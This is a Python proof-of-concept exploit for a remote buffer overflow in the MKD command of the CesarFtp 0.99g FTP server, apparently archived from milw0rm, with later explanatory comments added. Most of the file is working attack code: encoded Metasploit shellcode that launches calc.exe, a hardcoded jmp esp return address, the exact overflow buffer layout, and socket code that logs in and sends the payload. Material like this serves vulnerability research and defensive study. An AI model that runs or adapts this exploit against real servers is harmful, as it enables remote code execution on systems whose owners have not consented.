  1. #!/usr/bin/python
  2. #CesarFtp 0.99g 0day Exploit
  3. #Proof of Concept: execute calc.exe
  4. #Tested on XP sp2 polish
  5. #Bug found by h07 [h07@interia.pl]
  6. #Date: 10.06.2006
  7.  
  8. from socket import *
  9.  
# Payload: Metasploit-generated Win32 "execute calc.exe" shellcode,
# 312 bytes (19 lines of 16 plus a final 8).  It is opaque, encoded machine
# code: treat it as an untrusted binary blob, never patch bytes by hand, and
# prefer regenerating it yourself (e.g. msfvenom -p windows/exec CMD=calc.exe)
# over trusting a copy from a paste.  The leading "\x31\xc9\x83\xe9\xb8\xd9\xee"
# bytes look like a Metasploit 2.x-era fnstenv/sub XOR decoder stub --
# TODO confirm by disassembling before reuse.  The blob is sent inside a single
# FTP command line terminated by "\r\n" (see the MKD buffer below), so it
# presumably must not contain a CRLF of its own -- verify if replacing it.
shellcode = (  # execute calc.exe <metasploit.com>
"\x31\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
"\xde\x42\xd1\x83\xeb\xfc\xe2\xf4\xf5\xb4\xa9\x9c\xe1\x27\xbd\x2e"
"\xf6\xbe\xc9\xbd\x2d\xfa\xc9\x94\x35\x55\x3e\xd4\x71\xdf\xad\x5a"
"\x46\xc6\xc9\x8e\x29\xdf\xa9\x98\x82\xea\xc9\xd0\xe7\xef\x82\x48"
"\xa5\x5a\x82\xa5\x0e\x1f\x88\xdc\x08\x1c\xa9\x25\x32\x8a\x66\xf9"
"\x7c\x3b\xc9\x8e\x2d\xdf\xa9\xb7\x82\xd2\x09\x5a\x56\xc2\x43\x3a"
"\x0a\xf2\xc9\x58\x65\xfa\x5e\xb0\xca\xef\x99\xb5\x82\x9d\x72\x5a"
"\x49\xd2\xc9\xa1\x15\x73\xc9\x91\x01\x80\x2a\x5f\x47\xd0\xae\x81"
"\xf6\x08\x24\x82\x6f\xb6\x71\xe3\x61\xa9\x31\xe3\x56\x8a\xbd\x01"
"\x61\x15\xaf\x2d\x32\x8e\xbd\x07\x56\x57\xa7\xb7\x88\x33\x4a\xd3"
"\x5c\xb4\x40\x2e\xd9\xb6\x9b\xd8\xfc\x73\x15\x2e\xdf\x8d\x11\x82"
"\x5a\x9d\x11\x92\x5a\x21\x92\xb9\xc9\x76\x4e\xde\x6f\xb6\x52\x30"
"\x6f\x8d\xcb\x30\x9c\xb6\xae\x28\xa3\xbe\x15\x2e\xdf\xb4\x52\x80"
"\x5c\x21\x92\xb7\x63\xba\x24\xb9\x6a\xb3\x28\x81\x50\xf7\x8e\x58"
"\xee\xb4\x06\x58\xeb\xef\x82\x22\xa3\x4b\xcb\x2c\xf7\x9c\x6f\x2f"
"\x4b\xf2\xcf\xab\x31\x75\xe9\x7a\x61\xac\xbc\x62\x1f\x21\x37\xf9"
"\xf6\x08\x19\x86\x5b\x8f\x13\x80\x63\xdf\x13\x80\x5c\x8f\xbd\x01"
"\x61\x73\x9b\xd4\xc7\x8d\xbd\x07\x63\x21\xbd\xe6\xf6\x0e\x2a\x36"
"\x70\x18\x3b\x2e\x7c\xda\xbd\x07\xf6\xa9\xbe\x2e\xd9\xb6\xb2\x5b"
"\x0d\x81\x11\x2e\xdf\x21\x92\xd1")
  31.  
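def intel_order(i):
    """Pack *i* as a 4-byte little-endian ("Intel order") string.

    This is the ``struct.pack("<I", i & 0xffffffff)`` layout, built with
    ``chr`` so the result is a ``str`` that concatenates with the rest of
    the ``str`` payload under Python 2, which this script targets.  Only
    the low 32 bits of *i* are used; larger or negative values wrap
    silently, so pass a valid 32-bit address.

    Args:
        i: Integer address or value to encode.

    Returns:
        A 4-character string, least-significant byte first.
    """
    # Byte k holds bits 8k..8k+7; "& 0xff" wraps negatives like "% 256" did.
    return "".join(chr((i >> (8 * k)) & 0xff) for k in range(4))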
  42.  
# Lab target only: point this at an isolated VM running CesarFtp 0.99g that
# you own.  The script connects and sends the overflow as soon as it is run.
host = "192.168.13.132"
port = 21
# Credentials the server must accept; the overflow is sent only after the
# USER/PASS exchange below succeeds, so this is a post-auth bug as exercised.
user = "ftp"
password = "ftp"
# Value written over the saved return address: a "jmp esp" inside shell32.dll
# on Windows XP SP2 Polish, per the original author.  It is tied to that exact
# DLL build and language version -- locate a "jmp esp" (ff e4) in a non-ASLR
# module for any other target and replace this before running.
EIP = 0x77D8AF0A  # jmp esp <shell32.dll XP sp2 polish>
  48.  
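# --- Connect, authenticate, and send the overflowing MKD command ------------
# Python 2 script: payload strings are sent as raw bytes.  Everything below
# talks to a live host, so run it only against an isolated lab VM.  The socket
# is closed on every path, including a failed connect or login.
s = socket(AF_INET, SOCK_STREAM)
try:
    s.connect((host, port))
    print(s.recv(1024))  # server banner

    # Clear-text FTP login; recv() only shows the first 1 KB of each reply.
    s.sendall("user %s\r\n" % (user))
    print(s.recv(1024))

    s.sendall("pass %s\r\n" % (password))
    print(s.recv(1024))

    # Payload layout, kept exactly as in the original PoC:
    #   "MKD " + 671 bytes of LF padding + 3 filler bytes + EIP (little
    #   endian) + 10 NOPs + shellcode + CRLF.
    # The bare-LF padding is deliberate in the original; presumably the server
    # treats only CRLF as the command terminator -- TODO confirm.  The jmp esp
    # is presumably meant to land on the NOP sled ahead of the shellcode;
    # verify the offsets in a debugger before adapting to another build.
    payload = "MKD "
    payload += "\n" * 671
    payload += "A" * 3 + intel_order(EIP)
    payload += "\x90" * 10 + shellcode
    payload += "\r\n"

    print("len: %d" % (len(payload)))

    # sendall() rather than send(): send() may write only part of a ~1 KB
    # buffer, silently truncating the payload and corrupting the overflow.
    s.sendall(payload)
    try:
        # A successful overflow usually kills the server before it replies,
        # so EOF/reset here is the expected outcome, not a script bug.
        print(s.recv(1024))
    except error as exc:
        print("no reply (server likely crashed or reset): %s" % (exc,))
finally:
    s.close()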
  71.  
  72. #EoF
  73.  
  74. # milw0rm.com [2006-06-12]